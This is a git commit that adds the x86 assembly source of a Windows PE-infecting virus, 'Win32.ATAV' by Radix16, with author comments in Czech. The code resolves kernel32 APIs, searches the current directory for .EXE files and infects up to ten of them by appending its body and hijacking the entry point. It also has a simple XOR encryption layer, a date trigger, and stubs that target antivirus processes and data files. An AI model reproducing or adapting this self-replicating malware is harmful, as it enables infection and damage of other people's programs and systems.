Add files via upload

2026-06-16 07:49:24 +00:00 · 2020-10-10 22:07:43 -05:00
parent b3ade600b3
commit 3cac606e5f
100 changed files with 186749 additions and 0 deletions
@@ -0,0 +1,760 @@
+;-------------------------------
+;Fuck Beta virus Atav by Radix16
+;-------------------------------
+;Tak tohle je mozna prvni verze viru Atav ,nevim to jiste protoze se mi gdesi stratila.
+;Sami negdy uvidite zdrojak plne verze se hodne lisi s timhle TOHLE JE LAMME fuj!
+;Uz se na toto nemuzu ani divat ,nestojito ani za popis :)
+;
+;Nova verze mela by obsahovat : Poly , Update Internet , Fast infection .Ring3 -> Ring0
+;Takgze i nejake novinky pro svet :) ,ale jinac se presouvam i na LINUX :)))
+; 
+;Zatim Zdar :)
+
+
+.386p
+.Model Flat
+jumps
+
+.Data
+
+db ?
+
+extrn GetModuleHandleA :proc
+extrn ExitProcess :proc
+
+extrn MessageBoxA :proc
+
+VirusSize equ Virus_End-Start
+SizeCrypt equ Crypt_End-Crypto
+
+include mz.inc                                  
+include pe.inc                                 ;include files from Jacky Qwerty/29A
+include win32api.inc
+include useful.inc
+;////////////////////////////M Y  C O D E ///////////////////////////////////////////////////////
+.Code
+				Virus_Size equ Virus_End-Start
+
+Start:
+	pushad	
+	@SEH_SetupFrame <jmp seh_fn>
+	xchg [edx], eax                 
+
+seh_fn:	
+
+	call Base1
+			 		
+Base1:
+	pop ebp
+	sub ebp,offset Base1
+					FirstGeneration:	
+call Mutate1
+			 Crypto:
+
+Virus_Start:
+	
+	call Kernel?
+
+	mov esi, ebx                 
+       	mov ebx,[esi+10h]                
+       	add ebx,[ebp + imagebase]	
+	mov [ebp + offset f_RVA],ebx
+	mov eax,[esi] 
+	jz Not_Found_Kernel32
+	
+	mov esi,[esi]                   
+       	add esi,[ebp + offset imagebase]               
+       	mov edx,esi                     
+       	mov ecx,[ebp+offset importsize]
+       	mov eax,0    
+
+	Jmp Get_Module_Handle
+
+coded db 'Win32.ATAV (c)oded by Radix16[MIONS]',0	
+maintext db 'Heayaaa',0
+Kernel?:
+
+	mov esi,[ebp + offset imagebase]
+	cmp word ptr[esi],'ZM'
+	jne GetEnd	
+	
+	add esi,3ch
+	mov esi,[esi]
+	add esi,[ebp + offset imagebase]
+	push esi
+	cmp word ptr [esi], 'EP'       ;Win App  PE
+	jne GetEnd
+	
+	add esi, 28h                  
+       	mov eax, [esi] 
+	mov [ebp+entrypoint], eax 
+	pop esi
+	add esi,80h 
+	mov eax,[esi] 
+	mov [ebp+importvirtual],eax
+	mov eax,[esi+4]
+	mov [ebp+importsize],eax
+	mov esi,[ebp+importvirtual]
+	add esi,[ebp + offset imagebase]
+	mov ebx,esi
+	mov edx,esi
+	add edx,[ebp + importsize]
+Search_Kernel:	
+        mov esi,[esi + 0ch]
+	add esi,[ebp + offset imagebase]
+	cmp [esi],swKernel32
+	Je K32Found
+	add ebx, 14h                  
+        mov esi, ebx    
+        cmp esi, edx             
+        jg Not_Found_Kernel32       
+        jmp Search_Kernel  
+
+K32Found:
+	ret
+
+Not_Found_Kernel32:
+	mov eax, dword ptr [esp]         
+                                
+find_base_loop:                       
+       	cmp dword ptr [eax+0b4h], eax 
+       	je Found_Adress      
+       	dec eax             
+       	cmp eax, 40000000h  
+       	jbe assume_hardcoded     
+       	jmp find_base_loop
+              
+assume_hardcoded:                 
+      	mov eax, 0BFF70000h          
+      	cmp word ptr [eax], 'ZM'       
+      	je Found_Adress                       
+      	mov eax, 07FFF0000h
+
+Found_Adress:
+	mov [ebp+offset Kernel32], eax     ;Mam ju :))
+	mov edi, eax
+	cmp word ptr [edi],'ZM'         
+      	jne GetEnd 
+	mov edi, [edi+3ch]                
+      	add edi, [ebp+offset Kernel32]   
+      	cmp word ptr [edi],'EP'
+	jne GetEnd
+
+	pushad
+
+	mov esi,[edi+78H]                 
+      	add esi,[ebp+offset Kernel32]     
+      	mov [ebp+offset Export],esi       
+      	add esi,10H                      
+      	lodsd                            
+      	mov [ebp+offset basef],eax        
+      	lodsd                             
+      	lodsd                              
+      	mov [ebp+offset limit],eax      
+      	add eax, [ebp+offset Kernel32]     
+      	lodsd                            
+      	add eax,[ebp+offset Kernel32]     
+      	mov [ebp+offset AddFunc],eax     
+      	lodsd                            
+      	add eax, [ebp+offset Kernel32]   
+      	mov [ebp+offset AddName],eax     
+      	lodsd                              
+      	add eax,[ebp+offset Kernel32]     
+      	mov [ebp+offset AddOrd],eax     
+      	mov esi,[ebp+offset AddFunc]      
+      	lodsd                              
+	add eax,[ebp+offset Kernel32]
+	
+	mov esi, [ebp+offset AddName]    
+      	mov [ebp+offset Nindex], esi      
+      	mov edi,[esi]                    
+      	add edi,[ebp+offset Kernel32]    
+      	mov ecx,0                        
+      	mov ebx,offset API_NAMES          
+      	add ebx,ebp   
+
+TryAgain:                               
+      	mov esi,ebx  
+MatchByte:                               
+      	cmpsb                             
+      	jne NextOne                     
+                                        
+      	cmp byte ptr [edi], 0             
+      	je GotIt                          
+      	jmp MatchByte                     
+                                         
+NextOne:                                 
+     	inc cx                              
+     	cmp cx, word ptr [ebp+offset limit] 
+     	jge GetEnd
+
+	add dword ptr [ebp+offset Nindex], 4
+     	mov esi, [ebp+offset Nindex]        
+     	mov edi, [esi]                     
+     	add edi, [ebp+offset Kernel32]      
+     	jmp TryAgain 
+
+GotIt:
+      	mov ebx,esi                    
+      	inc ebx                          
+      	shl ecx,1  
+
+	mov esi, [ebp+offset AddOrd]     
+      	add esi,ecx                     
+      	xor eax,eax                    
+      	mov ax,word ptr [esi]         
+      	shl eax, 2                      
+      	mov esi,[ebp+offset AddFunc]     
+      	add esi,eax                      
+      	mov edi,dword ptr [esi]         
+      	add edi,[ebp+offset Kernel32]   
+
+       	mov [ebp+offset ddGetProcAddress], edi  
+      	popad                                
+	
+	mov esi, offset swExitProcess      
+      	mov edi, offset ddExitProcess     
+      	add esi, ebp                     
+      	add edi, ebp
+
+Repeat_find_apis:                      
+      	push esi                       
+      	mov eax,[ebp+offset Kernel32]    
+      	push eax                          
+      	mov eax,[ebp+offset ddGetProcAddress]
+      	call eax                         
+      	cmp eax,0                       
+      	je GetEnd                        
+      	stosd                          
+                                      
+repeat_inc:                           
+      	inc esi                         
+      	cmp byte ptr [esi], 0             
+      	jne repeat_inc                    
+      	inc esi                          
+      	cmp byte ptr [esi], 0FAh         
+      	jne Repeat_find_apis          
+ 
+	Jmp Virus_Game	
+      
+Get_Module_Handle:
+	cmp dword ptr [edx],0             
+      	je  Not_Found_Kernel32                     
+      	cmp byte ptr [edx+3],80h
+	je Not_Here 
+	mov esi,[edx]                     
+      	push ecx                         
+      	add esi,[ebp + offset imagebase]               
+      	add esi,2	
+	mov edi,offset gmhGetModuleHandleA              
+      	add edi,ebp                       
+      	mov ecx,gmhsize          
+      	rep cmpsb                        
+      	pop ecx       
+	je  f_GetModuleHandelA
+Not_Here:
+	inc eax                          
+      	add edx,4                       
+      	loop Get_Module_Handle
+	jmp Not_Found_Kernel32
+f_GetModuleHandelA:
+	shl eax,2                        
+      	mov ebx,[ebp+offset f_RVA]  
+      	add eax,ebx                     
+      	mov eax,[eax]                   
+
+      	mov edx,offset se_Kernel32	            
+      	add edx,ebp                    
+      	push edx                          
+      	call eax                         
+      	cmp eax,0	
+	jne Found_Adress
+	Jmp Not_Found_Kernel32
+
+
+Virus_Game:
+	push offset SystemTime
+	mov eax,[ebp + ddGetSystemTime]
+	call eax 
+
+	cmp byte ptr [SystemTime.wMonth],0Ah
+	jne Next_Game
+	cmp byte ptr [SystemTime.wDay],0Fh
+	jne Next_Game
+	
+	jmp Ok_Day_Month
+
+Next_Game:
+	mov dword ptr [ebp+offset infections], 0Ah
+	   
+	call SearchFiles
+	inc eax
+	jz GetEnd
+	dec eax
+	push eax
+	mov ecx,[edi.FileSizeLow] ;zisti velikost souboru
+	lea esi,[edi.FileName]         
+	call Infect
+	jc _try 
+      	dec dword ptr [ebp+offset infections]
+      	cmp word ptr [ebp+offset infections], 0
+      	je All_Done  
+_try:	
+	push edi      
+      	lea edi, [edi.FileName] 
+      	mov ecx, 13d
+      	mov al, 0  
+      	rep stosb 
+      	pop edi 
+      	pop eax
+      	push eax 
+      	push edi
+      	push eax 
+      	call dword ptr [ebp+offset ddFindNextFileA]
+	test eax,eax 
+      	jz All_Done
+	mov ecx,[edi.FileSizeLow] ;zisti velikost souboru
+	lea esi,[edi.FileName]    
+	call Infect
+	jc failinfection   
+        dec dword ptr [ebp+infections]  
+failinfection:                        
+      	cmp dword ptr [ebp+infections], 0  
+      	jne _try 
+
+All_Done:
+	pop eax
+GetEnd:
+	cmp ebp, 0                        
+      	je _exit                       
+      	mov eax,[ebp + offset oldip]       
+      	add eax,[ebp + offset imagebase]                
+      	jmp eax
+_exit:                              
+      	push 0                          
+      	mov eax, [ebp+offset ddExitProcess]
+      	call eax 
+	
+	
+
+PEheader dd 0    
+oldip dd 0
+oldsize dd 0 
+newsize dd 0                
+incsize dd 0
+newip dd 0
+
+Infect  proc	
+	
+	pushad
+	add ecx,VirusSize ;pricti virus k souboru
+	mov word ptr [ebp+infectionflag], 0 
+	mov [ebp + offset memory],ecx ; nastav max velikost pro mapovani souboru
+	call OpenFile                 ;volej funkci pro otevreni souboru
+	mov [ebp+offset filehandle], eax ; 
+	inc eax                    ; eax -1
+	jz Endus		    ; chyba? jestli ne tak jed dal	
+	call CMapFile
+	or eax,eax
+	jz Endus
+	call MapView
+	or eax,eax
+	jz Exit_Map
+	mov esi,eax
+	mov [ebp+offset mapaddress],esi
+	
+	cmp word ptr[esi],'ZM'    ;Zacina typickymi znaky jako EXE
+	jne UnMapw
+		
+	
+	mov ebx,dword ptr[esi+3ch]
+	cmp word ptr [esi+ebx],'EP'	;Je to PE
+	jne UnMapw
+	add esi,ebx
+	mov [PEheader+ebp], esi
+	mov eax, [esi+28h]
+	mov [oldip+ebp],eax      ;Uloz skok
+	mov eax,[esi+3ch]	
+	push eax 
+	xor eax, eax
+	mov ebx,[esi+74h]
+	shl ebx,3  
+	mov ax,word ptr [esi+6h]
+	dec eax
+	mov ecx,28h             
+      	mul ecx 
+	add esi,78h 
+      	add esi,ebx 
+      	add esi,eax
+	
+	or dword ptr ds:[esi+24h],0A0000020h
+	
+	mov eax,[esi+10h]
+	mov [oldsize+ebp],eax
+	add dword ptr [esi+8h],VirusSize
+
+	mov eax,[esi+8h]
+	pop ebx
+	mov ecx,ebx
+	div ecx
+	mov ecx,ebx
+	sub ecx,edx
+	mov [esi+10h],ecx
+	mov eax,[esi+8h] 
+	add eax,[esi+10h]
+      	mov [esi+10h],eax
+	mov [ebp+offset newsize], eax 
+
+	mov eax,[esi+0ch]               
+      	add eax,[esi+8h]                 
+      	sub eax,VirusSize                      
+      	mov [newip+ebp],eax
+
+	mov eax,[ebp+offset oldsize]    
+      	mov ebx,[ebp+offset newsize]       
+      	sub ebx,eax                          
+      	mov [ebp+offset incsize], ebx       
+                                             
+      	mov eax,[esi+14h]                  
+      	add eax,[ebp+offset newsize]      
+      	mov [ebp+offset newfilesize], eax
+	
+	mov eax, [esi+14h]                    
+      	add eax,[esi+8h]                   
+      	sub eax,VirusSize                     
+      	add eax,[ebp+offset mapaddress]      
+                                           
+      	call Write_File
+		
+	mov esi,[ebp+offset PEheader]
+	mov eax,[newip+ebp]
+	mov [esi+28h],eax 
+	mov eax, [ebp+offset incsize]  
+      	add [esi+50h], eax 
+
+UnMapw:
+	push dword ptr [ebp+offset mapaddress] 
+      	mov eax, [ddUnmapViewOfFile+ebp]      
+      	Call eax
+	
+Exit_Map:
+	push dword ptr [ebp+offset maphandle]
+	mov eax,[ddCloseHandle+ebp]
+	call eax	
+	
+	push dword ptr [ebp+offset filehandle]
+      	mov eax, [ddCloseHandle+ebp]         
+      	call eax  
+	Jmp Complete?
+infection_error:
+	stc
+      	jmp Endus  
+Complete?:
+	cmp word ptr [ebp+offset infectionflag], 0FFh
+      	je infection_error
+	clc   
+	
+Endus:
+	popad
+	ret
+Infect endp
+
+
+
+SearchFilesN proc
+	
+    	ret
+SearchFilesN endp
+
+SearchFiles proc
+	lea edi,[ebp + offset search]
+      	mov eax,edi 
+      	push eax
+      	lea eax,[ebp + offset _Exe]
+      	push eax
+      	call dword ptr[ebp+offset ddFindFirstFileA]	    
+	ret
+SearchFiles endp
+
+memory dd 0
+maphandle dd 0
+mapaddress dd 0
+
+CMapFile proc
+	push 0
+        push dword ptr [ebp+offset memory]  ; max.velikost
+        push 0
+        push PAGE_READWRITE  ;R/W
+	push 0
+	push dword ptr [ebp+offset filehandle]  ;handle
+	mov eax,dword ptr [ddCreateFileMappingA+ebp]
+	call eax
+	mov [ebp+offset maphandle], eax  ;uloz map.handle
+	ret
+CMapFile endp
+
+MapView proc
+	push dword ptr [ebp+offset memory]
+ 	push 0
+        push 0
+        push FILE_MAP_ALL_ACCESS
+        push eax 
+ 	mov eax,[ddMapViewOfFile+ebp]  
+      	call eax
+	ret                     
+MapView endp
+
+filehandle dd 0     ;rukojet souboru
+
+OpenFile proc
+	push 0           ;Atributy                    
+	push 0                               
+      	push 3           ;Otevri existuji soubor                
+      	push 0                               
+      	push 1                             
+      	push 80000000h or 40000000h          ;read a write
+      	push esi                             ;jmeno souboru
+      	mov eax, [ddCreateFileA+ebp]   ;
+      	Call eax                          ;volej
+	ret		;zpet
+OpenFile endp   ;v eax je rukojet souboru
+
+
+Kick_AV proc
+	push eax                   
+        cdq                            
+        push edx                     
+;            call FindWindowA              
+        xchg eax, ecx                
+        jecxz quit                    
+
+        push edx                    
+        push edx                      
+        push 12h                       
+        push ecx                       
+;       call PostMessageA               
+quit:
+	ret
+
+Kick_AV endp
+
+
+Delete_AV proc
+
+
+
+Delete_AV endp
+
+
+
+Ok_Day_Month:
+	
+
+
+;////////////////D A T A ////////////////////////////////////////////////////////////////////////
+
+
+
+	nop
+	imagebase dd 00400000h 
+	swKernel32 = 'NREK'
+	Kernel32 dd 00000000h  
+	importvirtual dd ?               
+	importsize dd ?     
+	entrypoint dd ?
+	f_RVA dd ?
+	Nindex dd 0   
+	basef dd 0
+	Export dd 0
+	limit dd 0
+	
+	AddFunc dd 0                  
+	AddName dd 0                    
+	AddOrd dd 0     
+	 
+	                 
+	             
+	newfilesize dd 0               
+	
+	infectionflag dw 0
+	gmhGetModuleHandleA db 'GetModuleHandleA',0
+	gmhsize = $-gmhGetModuleHandleA
+
+API_NAMES:
+	swGetProcAddress db 'GetProcAddress',0        
+	swExitProcess db 'ExitProcess',0         
+	swGetVersion db 'GetVersion',0
+	swFindFirstFileA db 'FindFirstFileA',0        
+	swFindNextFileA db 'FindNextFileA',0        
+	swGetCurrentDirectory db 'GetCurrentDirectoryA',0 
+	swSetCurrentDirectory db 'SetCurrentDirectoryA',0
+	swDeleteFile db 'DeleteFileA',0
+	swCreateFileMapping db 'CreateFileMappingA',0    
+	swMapViewOfFile db 'MapViewOfFile',0         
+	swUnmapViewOfFile db 'UnmapViewOfFile',0      
+	swGetFileAttributes db 'GetFileAttributesA',0   
+	swSetFileAttributes db 'SetFileAttributesA',0    
+	swGetDriveType db 'GetDriveTypeA',0        
+	swCreateFile db 'CreateFileA',0          
+	swCloseHandle db 'CloseHandle',0           
+	swGetFileTime db 'GetFileTime',0         
+	swSetFileTime db 'SetFileTime',0         
+	swSetFilePointer db 'SetFilePointer',0        
+	swGetFileSize db 'GetFileSize',0         
+	swSetEndOfFile db 'SetEndOfFile',0         
+	swGetSystemTime db 'GetSystemTime',0        
+	swGetModuleHandle db 'GetModuleHandleA',0 	
+	swWriteFile db 'WriteFile',0
+db 0FAh
+
+	ddGetProcAddress dd 0                        
+	ddExitProcess dd 0                        
+	ddGetVersion dd 0
+	ddFindFirstFileA dd 0                        
+	ddFindNextFileA dd 0                        
+	ddGetCurrentDirectoryA dd 0                        
+	ddSetCurrentDirectoryA dd 0
+	ddDeleteFileA dd 0
+ 	ddCreateFileMappingA dd 0                        
+	ddMapViewOfFile dd 0                        
+	ddUnmapViewOfFile dd 0                        
+	ddGetFileAttributesA dd 0                        
+	ddSetFileAttributesA dd 0                        
+	ddGetDriveTypeA dd 0                        
+	ddCreateFileA dd 0                        
+	ddCloseHandle dd 0                        
+	ddGetFileTime dd 0                        
+	ddSetFileTime dd 0                        
+	ddSetFilePointer dd 0                        
+	ddGetFileSize dd 0                        
+	ddSetEndOfFile dd 0                         
+	ddGetSystemTime dd 0                        
+	ddGetModuleHandleA dd 0  
+	ddWriteFile dd 0     
+
+
+max_path EQU 260                               
+
+se_Kernel32 db 'KERNEL32.dll',0
+
+Anti_AV:
+
+
+_Grisoft db 'avg?????.dat',0
+_AVP db 'AVP.CRC',0         
+_TBAW db 'anti-vir.dat',0							
+_MSAV db 'CHKLIST.MS',0 
+
+     
+_Kaspersky_ db 'AVP Monitor',0
+_Grisoft_ db 'AVG Control Center',0	
+
+
+_Exe db '*.EXE',0
+infections dd 0   
+                  
+      
+fnx dd 0
+
+
+
+Crypt_End:
+ 
+Mutate1:
+	
+	mov ecx,SizeCrypt	
+	lea esi,[ebp + Crypto]
+decr:
+	xor dword ptr [esi],0FFh
+	inc esi
+	loop decr	 
+End_Mutate: 
+       	ret
+
+Write_File proc
+	call Mutate1 	
+	mov edi, eax                          
+      	lea esi,[Start+ebp]                
+      	mov ecx, VirusSize                   
+      	rep movsb   
+	call Mutate1	
+	ret
+Write_File endp
+
+
+Virus_End:
+
+
+SYSTEMTIME struct
+  
+  	wYear                 WORD    ?       
+  	wMonth                WORD    ?       
+  	wDayOfWeek            WORD    ?     
+  	wDay                  WORD    ?     
+  	wHour                 WORD    ?       
+  	wMinute               WORD    ?      
+  	wSecond               WORD    ?     
+	wMilliseconds         WORD    ?      
+ends                                                
+
+filetime                        STRUC
+	FT_dwLowDateTime        DD ?
+        FT_dwHighDateTime       DD ?
+filetime                        ENDS 
+
+win32_find_data                 STRUC     
+        FileAttributes          DD ?        
+        CreationTime            filetime ?       
+        LastAccessTime          filetime ?      
+        LastWriteTime           filetime ?      
+        FileSizeHigh            DD ?       
+        FileSizeLow             DD ?      
+        Reserved0               DD ?          
+        Reserved1               DD ?          
+        FileName                DB max_path DUP (?) 
+        AlternateFileName       DB 13 DUP (?)     
+                                DB 3 DUP (?)      
+win32_find_data                 ENDS            
+
+                                                   
+search	win32_find_data ?
+SystemTime SYSTEMTIME <>
+	
+	windir db 128h dup(0)             
+       	sysdir db 128h dup(0)           
+       	crtdir db 128h dup(0)            
+
+Virtual_End:
+
+
+
+First_Gen:
+pushad
+call Next_Gen
+
+Next_Gen:
+pop ebp
+sub ebp,offset Next_Gen
+
+mov ecx,SizeCrypt	
+lea esi,[ebp + Crypto]
+decri:
+xor dword ptr [esi],0FFh
+inc esi
+loop decri	 
+
+
+push 0
+push offset TextF
+push offset TextF1
+push 0
+call MessageBoxA
+
+popad
+Jmp Start
+
+
+TextF db 'Win32.ATAV by Radix16[MIONS]',0
+TextF1 db 'First generation sample',0
+
+End First_Gen